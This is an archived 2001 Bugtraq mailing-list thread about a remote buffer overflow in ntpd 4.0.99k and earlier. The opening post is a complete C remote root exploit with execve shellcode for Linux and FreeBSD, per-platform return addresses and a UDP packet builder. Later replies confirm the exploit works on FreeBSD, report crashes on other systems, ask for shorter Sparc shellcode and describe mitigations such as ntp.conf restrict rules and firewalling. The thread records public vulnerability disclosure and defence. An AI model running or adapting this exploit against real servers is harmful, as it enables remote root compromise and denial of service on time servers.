6315271 2001-04-04 22:27 +0200  /286 rader/ Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-05  00:17  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: venglin@FREEBSD.LUBLIN.PL
Mottagare: Bugtraq (import) <16329>
Ärende: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010404222701.X91913@riget.scene.pl>

/* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */

/*
 * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
 * to remote buffer overflow attack. It occurs when building response for
 * a query with large readvar argument. In almost all cases, ntpd is running
 * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
 *
 * Although it's a normal buffer overflow, exploiting it is much harder.
 * The destination buffer is accidentally damaged when the attack is performed, so
 * the shellcode can't be larger than approx. 70 bytes. This proof of concept code
 * uses small execve() shellcode to run /tmp/sh binary. Full remote attack
 * is possible.
 *
 * NTP is stateless UDP based protocol, so all malicious queries can be
 * spoofed.
 *
 * Example of use on generic RedHat 7.0 box:
 *
 * [venglin@cipsko venglin]$ cat dupa.c
 * main() { setreuid(0,0); system("chmod 4755 /bin/sh");  }
 * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
 * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
 * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
 * ntpdx v1.0 by venglin@freebsd.lublin.pl
 *
 * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
 *
 * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
 * [1] <- evil query (pkt = 512 | shell = 45)
 * [2] <- null query (pkt = 12)
 * Done.
 * /tmp/sh was spawned.
 * [venglin@cipsko venglin]$ ls -al /bin/bash
 * -rwsr-xr-x    1 root     root       512540 Aug 22  2000 /bin/bash
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>

/* Filler byte used for the whole query buffer before anything else is
 * copied into it (see doquery). */
#define NOP	0x90
/* Bytes of return-address copies. doquery() loops ADDRS/4 times storing a
 * long, so the intended 8 bytes assumes sizeof(long) == 4. */
#define ADDRS	8
/* Size of the query buffer and of the first datagram written. */
#define PKTSIZ	512

/* Command-line help, printed on any unknown option or wrong argument count. */
static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";

/* generic execve() shellcodes */

/*
 * Payload for the RedHat row of targ[]. doquery() copies strlen() bytes of
 * it, and the array ends with the literal path "/tmp/sh" that the header
 * comment says must already exist on the target.
 */
char lin_execve[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

/*
 * Payload for the two FreeBSD rows of targ[]; same "/tmp/sh" path, followed
 * by trailing filler bytes. Both arrays are plain (non-const) globals,
 * although nothing in this file writes to them.
 */
char bsd_execve[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

/*
 * One row of the platform table below. The two offsets are byte positions
 * inside the PKTSIZ-byte query that doquery() builds.
 */
struct platforms
{
	char *os;	/* OS name shown in the -t menu */
	char *version;	/* ntpd version string shown in the menu */
	char *code;	/* payload array handed to doquery() as `shellcode` */
	long ret;	/* value stored ADDRS/4 times at buf + align (adjusted by -o) */
	int align;	/* offset of the ret copies within the query */
	int shalign;	/* offset at which `code` is copied into the query */
	int port;	/* only tested by main() after doquery(); the UDP port is
			 * hard-coded to 123 there and every row sets this to 0 */
};

/* Platforms. Notice that on FreeBSD the shellcode must be placed in the
 * packet *after* the RET address. These values will vary from platform to
 * platform. The two FreeBSD rows differ only in ret. The table ends with an
 * all-zero sentinel row: main() stops its menu loop at os == NULL, but it
 * does not range-check the -t index against the table.
 */

struct platforms targ[] =
{
	{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
		0xbfbff8bc, 200, 220, 0 },

	{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
		0xbfbff540, 200, 220, 0 },

	{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
		0xbffff777, 240, 160, 0 },

	{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};

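/*
 * Resolve `name` (dotted quad or hostname) to an IPv4 address in network
 * byte order, returned widened to long for the existing callers, which
 * store it into sin_addr.s_addr.
 *
 * Exits the process with status 1 (after a message on stderr) when the
 * name cannot be resolved to an IPv4 address.
 */
long getip(char *name)
{
	struct hostent *hp;
	in_addr_t ip;

	/* inet_addr() reports failure as INADDR_NONE (all ones), not as a
	 * negative value: the former `< 0` test only worked with a 32-bit
	 * long and misclassified any address with the high bit set. */
	ip = inet_addr(name);
	if (ip == INADDR_NONE)
	{
		if (!(hp = gethostbyname(name)))
		{
			/* h_errno is not an errno value, so strerror() would
			 * print an unrelated message; report the name instead. */
			fprintf(stderr, "gethostbyname(): cannot resolve %s\n", name);
			exit(1);
		}
		/* Only accept a 4-byte IPv4 answer; copying anything else
		 * into `ip` would read past or truncate the address. */
		if (hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof(ip)
		    || !hp->h_addr_list[0])
		{
			fprintf(stderr, "gethostbyname(): no IPv4 address for %s\n", name);
			exit(1);
		}
		memcpy(&ip, hp->h_addr_list[0], sizeof(ip));
	}

	return (long)ip;
}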

/*
 * Build and send the two UDP datagrams to port 123 of `host`.
 *
 * host      - hostname or dotted quad; resolved by getip(), which exit()s
 *             on failure, so no resolution error ever reaches this function.
 * ret       - value stored ADDRS/4 times starting at buf + align.
 * shellcode - payload copied to buf + shalign; strlen() bytes are copied.
 * align     - byte offset of the ret copies inside the PKTSIZ-byte query.
 * shalign   - byte offset of the payload inside the query.
 *
 * Returns 0 once both datagrams were written, -1 after perror() when
 * socket(), connect() or either write() fails (the socket is closed on
 * the failures that happen after it was created). Nothing is ever read
 * back from the target, so success here only means the writes succeeded.
 */
int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
	/* tcpdump-based reverse engineering :)) */

	/* First packet header, captured with tcpdump per the author's note.
	 * The tail 0x73 0x74 0x72 0x61 0x74 0x75 0x6d 0x3d is the ASCII text
	 * "stratum="; the rest of the PKTSIZ-byte query is filled below. */
	char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
		      0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
		      0x74, 0x75, 0x6d, 0x3d };

	/* Second, 12-byte packet: the "null query" in the log line below. */
	char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
		      0x00, 0x00, 0x00, 0x00 };

	char buf[PKTSIZ], *p;
	long *ap;
	int i;

	int sockfd;
	struct sockaddr_in sa;

	/* BSD bzero(); memset(&sa, 0, sizeof sa) is the portable spelling. */
	bzero(&sa, sizeof(sa));

	sa.sin_family = AF_INET;
	/* Destination port is hard-coded; the table's port field is not used here. */
	sa.sin_port = htons(123);
	sa.sin_addr.s_addr = getip(host);

	if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
	{
		perror("socket");
		return -1;
	}

	/* connect() on a datagram socket only fixes the peer so write() can
	 * be used; no packet is exchanged yet. */
	if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
	{
		perror("connect");
		close(sockfd);
		return -1;
	}

	/* Whole query is NOP-filled first, then the header is laid over it. */
	memset(buf, NOP, PKTSIZ);
	memcpy(buf, q2, sizeof(q2));

	/* ADDRS/4 == 2 stores of a long: exactly ADDRS bytes only where
	 * sizeof(long) == 4. The cast type (unsigned long *) also differs from
	 * ap's declared type (long *). Neither align nor shalign + strlen()
	 * is checked against PKTSIZ; both come straight from targ[]. */
	p = buf + align;
	ap = (unsigned long *)p;

	for(i=0;i<ADDRS/4;i++)
		*ap++ = ret;

	/* p is not read again after this assignment. */
	p = (char *)ap;

	memcpy(buf+shalign, shellcode, strlen(shellcode));

	if((write(sockfd, buf, PKTSIZ)) < 0)
	{
		perror("write");
		close(sockfd);
		return -1;
	}

	/* strlen() returns size_t but is printed with %d (mismatched
	 * conversion; %zu is the matching specifier). */
	fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
		strlen(shellcode));
	fflush(stderr);

        if ((write(sockfd, q3, sizeof(q3))) < 0)
        {
                perror("write");
                close(sockfd);
                return -1;
        }

	/* Same %d / size_t mismatch as above. */
	fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
	fflush(stderr);

	close(sockfd);

	return 0;
}

/*
 * Entry point: parses -t <platform index> and -o <offset>, prints the
 * platform menu when no type was given, then hands the selected targ[]
 * row to doquery(). Exit status is 0 on every path except a doquery()
 * failure (1); getip() may also exit(1) from inside doquery().
 */
int main(argc, argv)
int argc;
char **argv;
{
	/* Redundant with the declarations in <unistd.h>, kept as written. */
	extern int optind, opterr;
	extern char *optarg;
	int ch, type, ofs, i;
	long ret;

	/* opterr = 0 silences getopt()'s own diagnostics; bad options are
	 * reported through the usage text below instead. */
	opterr = ofs = 0;
	type = -1;

	while ((ch = getopt(argc, argv, "t:o:")) != -1)
		switch((char)ch)
		{
			case 't':
				/* atoi() has no error reporting: non-numeric input becomes 0. */
				type = atoi(optarg);
				break;

			case 'o':
				/* Signed adjustment added to the table's ret value below. */
				ofs = atoi(optarg);
				break;

			case '?':
			default:
				puts(usage);
				exit(0);

		}

	argc -= optind;
	argv += optind;

	/* NOTE(review): this string literal is split across two lines in the
	 * archived copy and will not compile as shown; presumably it was one
	 * line in the original posting. */
	fprintf(stderr, "ntpdx v1.0 by
venglin@freebsd.lublin.pl\n\n");

	if (type < 0)
	{
		fprintf(stderr, "Please select platform:\n");
		/* Walk targ[] up to its NULL sentinel row. */
		for (i=0;targ[i].os;i++)
		{
			fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
			targ[i].os, targ[i].version, (void *)targ[i].ret);
		}

		exit(0);
	}

	/* NOTE(review): type was only checked for < 0; an index at or past
	 * the sentinel row reads outside targ[]. */
	fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
			targ[type].os, targ[type].version);

	ret = targ[type].ret;
	ret += ofs;

	/* Exactly one positional argument (the hostname) is required; this is
	 * checked only after the table has already been indexed above. */
	if (argc != 1)
	{
		puts(usage);
		exit(0);
	}

	fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
		(void *)ret, targ[type].align, targ[type].shalign);

	if (doquery(*argv, ret, targ[type].code, targ[type].align,
		targ[type].shalign) < 0)
	{
		fprintf(stderr, "Failed.\n");
		exit(1);
	}

	fprintf(stderr, "Done.\n");

	/* Every row in targ[] has port == 0, so this message is printed
	 * whenever the datagrams were written. doquery() never reads anything
	 * back from the target, so "was spawned" is not a verified result. */
	if (!targ[type].port)
	{
		fprintf(stderr, "/tmp/sh was spawned.\n");
		exit(0);
	}

	exit(0);
}

-- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL:
PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP:
D48684904685DF43EA93AFA13BE170BF *
(6315271) /Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>/(Ombruten)
Kommentar i text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Kommentar i text 6316095 av Nixon (remontado)
6315541 2001-04-04 18:49 -0700  /40 rader/ Crist Clark <crist.clark@GLOBALSTAR.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-05  05:10  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: crist.clark@GLOBALSTAR.COM
Mottagare: Bugtraq (import) <16335>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Crist Clark <crist.clark@GLOBALSTAR.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACBCF0D.847AECA4@globalstar.com>

Przemyslaw Frasunek wrote:
>
> /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */

Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE
with the stock 4.0.99b. FreeBSD has a fix in CURRENT already.

More sobering, blindly aiming the exploit code at a Sparc running
xntpd 3.4y caused it to seg. fault and core. No time to double-check
if that is actually exploitable at this moment. How many NTP
distributions are based off of the vulnerable code? With the small
payload, gaining access might be hard, but the potential for DoS
looks pretty easy.

Playing with 'restrict' statements in the ntp.conf will prevent the
attacks (I tried, looks like it works), but with UDP NTP so trivial to
spoof, that only will get you so far. But can I assume that properly
using authorization keys will protect you from this attack (assuming
whoever else has the keys is trusted) in a similar way? My guess is
that it should, but I have not had the chance to double check the
protocol or actually run the test on that one.

But this is really troubling when trying to use a public NTP server.
--
Crist J. Clark                                Network Security Engineer
crist.clark@globalstar.com                    Globalstar, L.P.
(408) 933-4387                                FAX: (408) 933-4926

The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above.
If the reader of this e-mail is not the intended recipient, or the
employee or agent responsible to deliver it to the intended
recipient, you are hereby notified that any review, dissemination,
distribution or copying of this communication is strictly prohibited.
If you have received this e-mail in error, please contact
postmaster@globalstar.com
(6315541) /Crist Clark <crist.clark@GLOBALSTAR.COM>/(Ombruten)
6323242 2001-04-04 14:38 -0700  /31 rader/ Gary E. Miller <gem@RELLIM.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  03:16  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: gem@RELLIM.COM
Mottagare: Bugtraq (import) <16343>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: "Gary E. Miller" <gem@RELLIM.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.32.0104041436490.591-100000@catbert.rellim.com>

Yo All!

ftp.udel.edu lists ntp 4.0.99k as the newest available.

Any patches yet?

Have the maintainers been notified?

RGDS
GARY
---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Ave, Suite E-3, Bend, OR 97701
	gem@rellim.com  Tel:+1(541)382-8588 Fax: +1(541)382-8676

On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:

> /*
>  * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
>  * to remote buffer overflow attack. It occurs when building response for
>  * a query with large readvar argument. In almost all cases, ntpd is running
>  * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
(6323242) /Gary E. Miller <gem@RELLIM.COM>/---------
6323277 2001-04-05 11:38 +0200  /29 rader/ Ogle Ron (Rennes) <OgleR@THMULTI.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  04:13  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: OgleR@THMULTI.COM
Mottagare: Bugtraq (import) <16344>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: "Ogle Ron (Rennes)" <OgleR@THMULTI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <05B4910E0216D411B14F00508B6A67A901213F7E@RENEXCH5.rennes.thmulti.com>

There is only a patch for the NTP software from
http://phk.freebsd.dk/patch/ntpd.patch.  We are going to wait for a
full released and tested version of NTP to be released from
http://www.ntp.org/.  Until that time, we are blocking NTP access
from the Internet (for those of us who use Internet stratum 1
servers) for the NTP protocol.  This should be a very low risk
situation because our internal stratum 2 server will keep time close
enough to "real" time for at least the next several days.

I suggest that other people in the same situation do the same until a
proper fix is made.

My .02
Ron Ogle

-----Original Message-----
From: Przemyslaw Frasunek [mailto:venglin@FREEBSD.LUBLIN.PL]
Sent: Wednesday, April 04, 2001 10:27 PM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ntpd =< 4.0.99k remote buffer overflow


/* ntpd remote root exploit / babcia padlina ltd.
<venglin@freebsd.lublin.pl> */
(6323277) /Ogle Ron (Rennes) <OgleR@THMULTI.COM>/(Ombruten)
6323336 2001-04-05 14:08 +0200  /30 rader/ Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  05:07  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: cadence@APOLLO.ACI.COM.PL
Mottagare: Bugtraq (import) <16346>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10104051358390.8483-100000@apollo.aci.com.pl>

On Wed, 4 Apr 2001, Crist Clark wrote:

> Przemyslaw Frasunek wrote:
> >
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
>
> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
>
> More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> caused it to seg. fault and core. No time to double-check if that is actually
> exploitable at this moment. How many NTP distributions are based off of the
> vulnerable code? With the small payload, gaining access might be hard, but
> the potential for DoS looks pretty easy.

On IRIX 6.5.11 it also seg faults.

ntpq
ntpq> version
ntpq 3-5.93e Thu Dec 10 10:49:39 PST 1998 (1)
ntpq> quit

It's rather old isn't it?
It's the default IRIX 6.5.11 installation.
(6323336) /Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>/
6323400 2001-04-05 08:52 -0300  /35 rader/ Durval Menezes <durval@TMP.COM.BR>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  05:20  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: durval@TMP.COM.BR
Mottagare: Bugtraq (import) <16347>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Durval Menezes <durval@TMP.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010405085243.C31459@tmp.com.br>

Hello,

> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
>
> More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> caused it to seg. fault and core. No time to double-check if that is actually
> exploitable at this moment. How many NTP distributions are based off of the
> vulnerable code? With the small payload, gaining access might be hard, but
> the potential for DoS looks pretty easy.

Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a
Redhat Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY
effect: no root shell was spawned, and the daemon stayed up. An
"strace" of the running xntpd process confirmed this: no exec
syscalls were attempted.

Same thing on SPARC Solaris 2.5.1 also running xntpd 3.5f: no shell,
and the xntpd daemon stayed up with no exec syscalls showing on
"truss".

Another vindication for those (like me) that don't like to run the
"latest and greatest" versions of any code (I only upgrade my
machines when forced to, either because of security bugs, or because
of desperately needed new functionality, and even then only after
running it for awhile on a test system INSIDE my firewall, and
preferably doing an audit on the code myself).

Best regards,
--
   Durval Menezes (durval AT tmp DOT com DOT br, http://www.tmp.com.br/)
(6323400) /Durval Menezes <durval@TMP.COM.BR>/(Ombruten)
6323528 2001-04-05 20:03 -0400  /21 rader/ Charles Sprickman <spork@INCH.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  05:45  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: spork@INCH.COM
Mottagare: Bugtraq (import) <16348>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Charles Sprickman <spork@INCH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSF.4.30.0104052001020.21512-100000@shell.inch.com>

On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:

> /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */

Just a quick note to save others a bit of legwork...  If you are
running ntpd on a machine simply as a client, the following line in
/etc/ntp.conf should keep people away:

restrict default ignore

Before adding this (I actually had the wrong syntax), the exploit
crashed ntpd.  Afterwards, not a blip, and ntpdate shows that ntpd is
not answering anything...

Charles
(6323528) /Charles Sprickman <spork@INCH.COM>/(Ombruten)
6323794 2001-04-05 15:30 +0100  /30 rader/ Matt Collins <matt@CLUES.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  07:15  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: matt@CLUES.COM
Mottagare: Bugtraq (import) <16351>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Matt Collins <matt@CLUES.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010405153042.A3064@sherlock.clues.com>

On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
> Przemyslaw Frasunek wrote:
> >
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
>
> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
>
> More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> caused it to seg. fault and core. No time to double-check if that is actually
> exploitable at this moment. How many NTP distributions are based off of the
> vulnerable code? With the small payload, gaining access might be hard, but
> the potential for DoS looks pretty easy.

We've taken a peek at getting sparc shellcode working with
this. Getting it in below the 70 byte buffer size is tricky.

Does anybody out there have working shellcode for this that can do
*anything* to the state of the system even if it doesn't lead to full
sploit? (beyond making ntp core of course ;) )

cheers,

Matt
(6323794) /Matt Collins <matt@CLUES.COM>/-(Ombruten)
6324567 2001-04-05 15:12 -0400  /36 rader/ Charles Sprickman <spork@INCH.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  10:24  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: spork@INCH.COM
Mottagare: Bugtraq (import) <16354>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Charles Sprickman <spork@INCH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSF.4.30.0104051512090.21512-100000@shell.inch.com>

On Wed, 4 Apr 2001, Crist Clark wrote:

> Playing with 'restrict' statements in the ntp.conf will prevent the
> attacks (I tried, looks like it works), but with UDP NTP so trivial to
> spoof, that only will get you so far. But can I assume that properly
> using authorization keys will protect you from this attack (assuming
> whoever else has the keys is trusted) in a similar way? My guess is
> that it should, but I have not had the chance to double check the
> protocol or actually run the test on that one.

Has anyone verified that the access list prevents such things?

Thanks,

Charles

> But this really troubling when trying to use a public NTP server.
> --
> Crist J. Clark                                Network Security Engineer
> crist.clark@globalstar.com                    Globalstar, L.P.
> (408) 933-4387                                FAX: (408) 933-4926
>
> The information contained in this e-mail message is confidential,
> intended only for the use of the individual or entity named above.  If
> the reader of this e-mail is not the intended recipient, or the employee
> or agent responsible to deliver it to the intended recipient, you are
> hereby notified that any review, dissemination, distribution or copying
> of this communication is strictly prohibited.  If you have received this
> e-mail in error, please contact postmaster@globalstar.com
>
(6324567) /Charles Sprickman <spork@INCH.COM>/------
6324741 2001-04-04 21:02 -0400  /10 rader/ Klaus Steden <klaus@COMPT.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  10:48  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: klaus@COMPT.COM
Mottagare: Bugtraq (import) <16355>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Klaus Steden <klaus@COMPT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010404210222.Y879@cthulu.compt.com>

Both exploits crash 4.0.99b on FreeBSD 4.2-STABLE; the first dies
with SIGBUS, the second with SIGILL.

Klaus
(6324741) /Klaus Steden <klaus@COMPT.COM>/(Ombruten)
6324880 2001-04-04 20:46 -0700  /57 rader/ Christopher McCrory <chrismcc@PRICEGRABBER.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  11:10  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: chrismcc@PRICEGRABBER.COM
Mottagare: Bugtraq (import) <16358>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow]
------------------------------------------------------------
From: Christopher McCrory <chrismcc@PRICEGRABBER.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACBEA83.8090801@pricegrabber.com>

Hello...

	In this message I was replying to a co-worker, but others
might benefit.

you wrote:

 > I use the following code snippet in my /etc/rc.d/rc.firewall code
which runs
 > whenever I start my machine:
 >
 > #
 > # NTP from SPECIFIC SERVERS.  Make sure to re-run /etc/rc.d/rc.firewall
 > # if you change the list of these servers, as we don't want to provide
 > # NTP to other clients that aren't us.
 > #
 > for i in `awk '/^server/ && !/127.127.1.0/ {print $2}' /etc/ntp.conf`; do
 >   $IPCHAINS -A input -i $EXTERNALIF -p udp -s $i/32 -d $EXTERNALIP/32
ntp -j
 > ACCEPT
 > done
 >
 > =================
 >
 > The above causes the server to only pay attention to NTP traffic
originating
 > from known servers in my /etc/ntp.conf file. (The default is to DENY all
 > unknown traffic.)  But because it's a good idea ot fix this sort of
problem
 > generally, I'll look for a patch from RedHat.  Thanks for the update.
 >

     Four years ago spoofing a tcp connection was hard, but not
impossible.  Today it is, in practice, impossible due to real (not
pseudo) random sequence numbers.  Spoofing a udp session is still
easy due to its connectionless properties.  The NTP protocol uses
udp.  There aren't _that_ many stratum 1 and 2 ntp servers.  The
sample code executed "/tmp/sh", but there is no reason it couldn't
execute "/sbin/ipchains --flush".  Followed by a 'real' exploit.





--

Christopher McCrory
"The guy that keeps the servers running"
chrismcc@pricegrabber.com
http://www.pricegrabber.com

"Linux: Because rebooting is for adding new hardware"
(6324880) /Christopher McCrory <chrismcc@PRICEGRABBER.COM>/(Ombruten)
6324968 2001-04-04 20:10 -0700  /17 rader/ Bruce A. Mah <bmah@CISCO.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  11:28  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: bmah@cisco.com
Mottagare: Bugtraq (import) <16359>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
If memory serves me right, Crist Clark wrote:
> Przemyslaw Frasunek wrote:
> >
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
>
> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.

FreeBSD 4-STABLE got the fix a couple minutes later.

Bruce.
(6324968) /Bruce A. Mah <bmah@CISCO.COM>/-----------
Bilaga (application/pgp-signature) i text 6324969
6324969 2001-04-04 20:10 -0700  /10 rader/ Bruce A. Mah <bmah@CISCO.COM>
Importerad: 2001-04-06  11:28  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: bmah@cisco.com
Mottagare: Bugtraq (import) <16360>
Bilaga (text/plain) till text 6324968
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: Exmh version 2.2 06/23/2000

iD8DBQE6y+I52MoxcVugUsMRAgrkAKCULaMwBRg1NETvgu+ERsJ74kOAqACeODFZ
ZLOEFaVV40VWLlG9mLfbhII=
=5Ayh
-----END PGP SIGNATURE-----
(6324969) /Bruce A. Mah <bmah@CISCO.COM>/-----------

6328704 2001-04-05 22:56 -0500  /25 rader/ Stephen Clouse <stephenc@THEIQGROUP.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  20:11  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: stephenc@THEIQGROUP.COM
Mottagare: Bugtraq (import) <16362>
